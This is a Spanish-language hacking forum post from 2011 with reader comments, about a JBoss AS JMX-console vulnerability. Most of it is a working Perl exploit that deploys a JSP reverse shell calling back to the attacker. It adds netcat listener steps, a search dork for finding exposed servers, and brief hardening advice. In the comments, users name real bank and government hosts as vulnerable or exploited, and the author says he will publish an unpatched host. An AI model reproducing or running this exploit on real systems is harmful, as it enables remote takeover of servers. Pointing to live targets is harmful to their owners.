Explotar Servidores JBoss vulnerables o mal configurados

Publicado el 25/10/2011 12:10:00 en Hacking General.
Author: [x][x] n4ch0m4n | Total de votos: 11   Vote



Se ha detectado un gusano que afecta a los servidores que ejecutan JBoss AS y aplicaciones basadas en él. Se aprovecha de consolas JMX incorrectamente aseguradas o sin ninguna protección para ejecutar código arbitrario. Se propaga inyectándose en la consola a través del método HEAD con una llamada a la función 'store' del servicio 'jboss.admin' de la forma siguiente:




También se aprovecha de sistemas más antiguos que no están parcheados para corregir la vulnerabilidad CVE-2010-0738 subsanada en abril de 2010. El gusano está escrito en Perl.

Dejo el código el perl que explota esta vulnerabilidad:

#JBoss AS Remote Exploit
#by Kingcope
#####

use IO::Socket;
use LWP::UserAgent;
use URI::Escape;
use MIME::Base64;

sub usage {
	print "JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl <target> <targetport> <yourip> <yourport> <win/lnx>\n";
	print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n";
	exit;
}

if ($#ARGV != 4) { usage; }

$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$com = $ARGV[4];

if ($com eq "lnx") {
	$comspec = "/bin/sh";
}

if ($com eq "win") {
	$comspec = "cmd.exe";
}

$|=1;

$jsp="
<%@
page import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"
%>
			<%!
				static class StreamConnector extends Thread
				{
					InputStream is;
					OutputStream os;

					StreamConnector( InputStream is, OutputStream os )
					{
						this.is = is;
						this.os = os;
					}

					public void run()
					{
						BufferedReader in  = null;
						BufferedWriter out = null;
						try
						{
							in  = new BufferedReader( new InputStreamReader( this.is ) );
							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
							char buffer[] = new char[8192];
							int length;
							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
							{
								out.write( buffer, 0, length );
								out.flush();
							}
						} catch( Exception e ){}
						try
						{
							if( in != null )
								in.close();
							if( out != null )
								out.close();
						} catch( Exception e ){}
					}
				}
			%>
			<%
				try
				{
					Socket socket = new Socket( \"$myip\", $myport );
					Process process = Runtime.getRuntime().exec( \"$comspec\" );
					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
				} catch( Exception e ) {}
			%>";

#print $jsp;exit;

srand(time());

sub randstr
{
	my $length_of_randomstring=shift;# the length of 
			 # the random string to generate

	my @chars=('a'..'z','A'..'Z','0'..'9','_');
	my $random_string;
	foreach (1..$length_of_randomstring) 
	{
		# rand @chars will generate a random 
		# number between 0 and scalar @chars
		$random_string.=$chars[rand @chars];
	}
	return $random_string;
}

$appbase = randstr(8);
$jspname = randstr(8);

print "APPBASE=$appbase\nJSPNAME=$jspname\n";

$bsh_script = 
qq{import java.io.FileOutputStream; 
import sun.misc.BASE64Decoder;

String val = "} . encode_base64($jsp, "") .  qq{";

BASE64Decoder decoder = new BASE64Decoder(); 
String jboss_home = System.getProperty("jboss.server.home.dir"); 
new File(jboss_home + "/deploy/} . $appbase . ".war" . qq{").mkdir(); 
byte[] byteval = decoder.decodeBuffer(val); 
String jsp_file = jboss_home + "/deploy/} . $appbase . ".war/" . $jspname . ".jsp" . qq{"; 
FileOutputStream fstream = new FileOutputStream(jsp_file); 
fstream.write(byteval); 
fstream.close(); };

# 
# UPLOAD 
# 
    
$params = 'action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=' . uri_escape($bsh_script) 
.
'&argType=java.lang.String&arg1=' . randstr(8) . '.bsh';

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");

my $req = HTTP::Request->new(POST => "https://$host:$port/jmx-console/HtmlAdaptor");
  $req->content_type('application/x-www-form-urlencoded');
  $req->content($params);
   
  print "UPLOAD... ";
  my $res = $ua->request($req);

  if ($res->is_success) {
      print "SUCCESS\n";
      print "EXECUTE";
      sleep(5);
      $uri = '/' . $appbase . '/' . $jspname . '.jsp';
      
      for ($k=0;$k<10;$k++) {
      my $ua = LWP::UserAgent->new;
	  $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
	  my $req = HTTP::Request->new(GET => "https://$host:$port$uri");
	  my $res = $ua->request($req);

  		if ($res->is_success) {
	  		print "\nSUCCESS\n";
	  		exit;
  		} else {
	  		print ".";
#		        print $res->status_line."\n";

	  		sleep(5);
  		}
	  }
      print "UNSUCCESSFUL\n";
  }
  else {
	  print "UNSUCCESSFUL\n";
      print $res->status_line, "\n";
      exit;
  }


El otro exploit está acá: https://www.securityfocus.com/bid/39710/exploit

La forma de utilizarlo es (explico solo para el exploit que puse el código):

1-Abrir dos consolas
2-Poner una de ellas en escucha: por ej: nc -l -p 666 -vvv
3-Correr el exploit en la otra consola: perl exploit.pl host_victima 8080 host_escucha 666 lnx (siendo lnx para sistemas GNU/Linux y "win" de tratarse de windows, es para indicarle si toma /bin/bash o cmd.exe)

Un video de ejemplo (aclaro que el video no es de mi autoría)(al final puse un ejemplo real recién salido del horno):



Dejo un dork para encontrar algunos servidores JBOSS para probar, he probado algunos y no di con alguno vulnerable....por ahora...


inurl:jmx-console/HtmlAdaptor



Ahora bien, ya vimos como explotarlo ahora veamos como segurizar esta vulnerabilidad.

Para evitar la infección se deben aplicar los parches de seguridad disponibles así como las siguientes configuraciones para asegurar la consola JMX:

https://community.jboss.org/wiki/SecureTheJmxConsole

Además resulta conveniente configurar las siguientes protecciones lógicas:

* Quitar los privilegios de 'root' a los procesos de JBoss AS.

* Cambiar la configuración de seguridad por defecto de la consola JMX para bloquear todas las peticiones a través de los métodos GET y POST que no estén debidamente autenticadas. Para ello se debe editar el archivo 'deploy/jmx-console.war/WEB-INF/web.xml' y eliminar las líneas indicadas:




* Habilitar 'RewriteValve' para bloquear peticiones externas que intenten acceder a URLs de administración como, por ejemplo, jmx-console, editando el archivo 'deploy/jbossweb.sar/server.xml' de la siguiente forma:



Además es conveniente crear el directorio 'conf/jboss.web', y en su interior el fichero 'rewrite.properties' con el siguiente contenido:



Esto bloqueará todas las peticiones que no provengan de la propia máquina (127.0.0.1) o de la red LAN (en este ejemplo 192.168.x.x).

Nótese en la antepenúltima línea del ejemplo del fichero de configuración, que la IP de la red es del tipo 192.168.x.x, esto debe modificarse según la configuración concreta de la red de cada caso.

Espero les sea de interés!

Fuente: recompilación de varias fuentes

-------------------------
ACTUALIZACIÓN:
-------------------------

Bien, buscando y buscando di con un servidor vulnerable. Igual acabo de reportar el fallo, vamos a darle un poco de changüi a ver si lo corrigen:


Comments:


[x]
[x][x] n4ch0m4n (11 y) : 54912 Actualicé el post con un ejemplo real de un host vulnerable...


[x]
[x][x] zer0max (11 y) : 54914 hace tiempo un banco de mexico llamado famsa poseia esta vulnerabilidad , duro bastate tiempo , hoy solo quedan recuerdos de ello.

https://www.banfamsa.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Aservice%3DMainDeployer

500 internal server error


Este aplicacion consiste en inyectar en la sección voidURL() de JBOSS una shell jsp en el servidor.

$ echo 'A continuación el JSP'
$ cat > cmd.jsp
< %@ page import="java.util.*,java.io.*"%>
< %
%>
<html><body>

Esta es posible explotarla desde metasploit.

Dork gob: inurl:web-console+gob

allamos http://portal.sea.gob.cl/web-console/
hahaha

16274.pl sigpro.conelec.gob.ec 8080 192.168.56.1 443 lnx exploited






[x]
[x][x] MuldeR (11 y) : 54915 muy buen post, es tuyo?


[x]
[x][x] zer0max (11 y) : 54917 el de sigpro.conelec.gob.ec esta fixed he , eso fue ya hace tiempo =)


[x]
[x][x] n4ch0m4n (11 y) : 54919 MuldeR si, la info la saque en parte de varias fuentes de internet. Luego la prueba que puse en la actualización fue posterior al post, dado que encontré una web vulnerable, la cual ya reporté.

Perdón que consulte, pero porque la duda? Verás que parte del texto esta sacado de Hispasec como también prevenirlo, el video de otro sitio, el dork me lo armé con info de por ahí y la web de ejemplo es un sitio que encontré vulnerable (no puse la info del mismo dado que lo reporté)


[x]
[x][x] MuldeR (11 y) : 54921 +1


[x]
[x][x] MAZTOR (11 y) : 54924 Bonito, simple e interesante el Articulo +1


[x]
[x][x] n4ch0m4n (11 y) : 54926 Gracias MuldeR y MAZTOR!!! me alientan a seguir posteando! (intentaré en lo posible que sea interesante)


[x]
[x][x] Alverid (11 y) : 54927 nice :D +1 referente a tu duda es por que algunos tienen la mala costumbre de copiar contenido de otros lados sin poner o citar la fuente :P y hacerse de la autoria del mismo XD

saludos


[x]
[x][x] n4ch0m4n (11 y) : 54928 Gracias Alverid! Respecto a lo que comentás, si entiendo, pero me pareció raro porque en sí lo aclaré en el post que fue un rejunte de fuentes lo que espongo, solo que al final pongo un ejemplo práctico.

Abrazo!


[x]
[x][x] KzZiIi3l (11 y) : 54930 Un post interesante, sigue así man!
y ojala qe todos, ya qe veo qe el foro esta medio abandonado :P.


[x]
[x][x] KzZiIi3l (11 y) : 54931 perdon .. te dejo +1 :D


[x]
[x][x] n4ch0m4n (11 y) : 54932 gracias KzZiIi3l, abrazo!


[x]
[x][x] 0verflow (11 y) : 54935 Se agradece el esfuerzo que has hecho recopilando la info en un mismo post. Muy interesante +1!


[x]
[x][x] n4ch0m4n (11 y) : 54936 Gracias a vos Overflow por el comentario!


[x]
[x][x] KiKoArg (11 y) : 54940 Si es tuyo, tonce +1


[x]
[x][x] n4ch0m4n (11 y) : 54941 Gracias KiKiArg, el post es mío si esa es la duda, la información la busqué y coloque yo y el host vulnerable también lo encontré yo...todo bien pero no sé porque tanta duda che..

Igual mañana se acaba el changüí a los de este host vulnerable, ni se molestaron en corregirlo, así que voy a dar la info del mismo


[x]
[x][x] SH4V (11 y) : 54961 +1! buen post!!


[x]
[x][x] n4ch0m4n (11 y) : 54962 gracias SHAV!!! abrazo